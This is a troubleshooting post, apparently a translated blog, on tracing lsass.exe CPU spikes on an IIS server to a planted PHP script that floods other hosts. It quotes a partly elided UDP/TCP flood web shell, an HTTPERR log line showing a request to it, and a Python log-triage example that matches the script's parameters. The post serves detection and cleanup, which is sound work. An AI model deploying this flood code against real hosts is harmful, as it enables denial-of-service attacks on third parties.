Troubleshooting abnormal lsass.exe CPU usage on a Windows server

  • 2020-05-12 06:32:33
  • OfStack

lsass.exe periodically consumes far too much CPU. The spikes are not permanent: usage drops back to normal after a while, then climbs again. While CPU is high the website loads slowly, and the cycle keeps repeating.

Whenever CPU was high, the accompanying symptom was a surge in network traffic: outbound (upload) throughput sometimes reached 30M-90M/s. That is the signature of the server attacking others, so my first thought was that this was the cause.

A typical outbound-attack file looks like the one below; this kind of script turns up easily with an online search.

<?php
set_time_limit(86400);
ignore_user_abort(True);
$packets = 0;
$http = $_REQUEST['http'];
$rand = $_REQUEST['exit'];
$exec_time = $_REQUEST['time'];
........
echo $_REQUEST['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_REQUEST['rat'];
exit;
}
echo "Php 2012 Terminator";
exit;
}
for($i=0;$i<65535;$i++)
{
$out .= "X";
}
/........
}
$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
if($rand==500)
while(1)
{
$packets++;
if(time() > $max_time){
break;
}
$fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
while(1)
{
$packets++;
if(time() > $max_time){
break;
}
$fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
?>

So how do you work out which site on the server is doing this?
Open the HTTP.sys error log under
C:\Windows\System32\LogFiles\HTTPERR\httperr... log (pick the file for today's date).
It contains entries like this:

2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1

The last three fields are 783 Disabled 30_FreeHost_1.
So 783 is the site ID in IIS (s-siteid), Disabled is the reason the request was rejected (s-reason), and
30_FreeHost_1 is the application pool, i.e. the request queue (s-queuename).
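Triage of the HTTPERR log described above, as an added example that is not part of the original post: it splits entries into the HTTP.sys field layout, flags requests whose query string carries the DoS script's parameters (host/port/time in the sample request, http/exit/time in the script), and counts them per site ID and application pool. The sample log is constructed; only its first entry is the one quoted above.

```python
"""Triage HTTP.sys error-log (HTTPERR) entries to find which IIS site and pool
is sourcing attack traffic. Added example; field layout follows the page's entry."""
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Fields of an HTTPERR entry, in order (default HTTP.sys error-log layout).
FIELDS = ["date", "time", "c_ip", "c_port", "s_ip", "s_port", "protocol",
          "verb", "url", "status", "siteid", "reason", "queuename"]

# Query parameters the DoS script reads via $_REQUEST. Names are taken from the
# sample request on the page (host/port/time) and the script (http/exit/time).
SUSPECT_PARAMS = {"host", "port", "time", "http", "exit"}

# Constructed sample log: the first entry is the one quoted on the page,
# the others are made up for the example.
SAMPLE_LOG = """#Software: Microsoft HTTP API 2.0
#Fields: date time c-ip c-port s-ip s-port cs-version cs-method cs-uri sc-status s-siteid s-reason s-queuename
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
2011-04-26 06:37:29 58.255.112.112 26818 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
2011-04-26 06:40:01 10.0.0.5 40000 98.126.247.13 80 HTTP/1.1 GET /index.php 400 12 BadRequest 30_FreeHost_2
"""

def parse_line(line):
    """Split one entry into a dict; returns None for comment, blank or short lines."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split(" ")
    if len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))

def is_suspect(entry):
    """True when the query string carries at least two of the DoS script's parameters."""
    qs = parse_qs(urlsplit(entry["url"]).query)
    return len(SUSPECT_PARAMS & set(qs)) >= 2

def triage(log_text):
    """Return Counter {(siteid, queuename): suspect-request count}."""
    hits = Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_suspect(entry):
            hits[(entry["siteid"], entry["queuename"])] += 1
    return hits

if __name__ == "__main__":
    for (site, pool), n in triage(SAMPLE_LOG).most_common():
        print(f"site {site} pool {pool}: {n} suspect requests")
```

On a real server, read each httperr*.log file under the HTTPERR directory and pass its text to triage(); the site ID with the most hits is the one to inspect first.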

Solutions:

Once you have found the site, fix it. If circumstances allow, you can simply disable the fsockopen function in PHP, but in most cases that is not an option.
Instead, search the site's web root for this line:

$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);

With the help of a search tool you can locate that line, or just the string $fp = fsockopen, so the attack file cannot hide among the site's files. Of course, do not delete legitimate files that use it, such as mail-sending scripts. Finally, restart the service, and the server no longer lags.

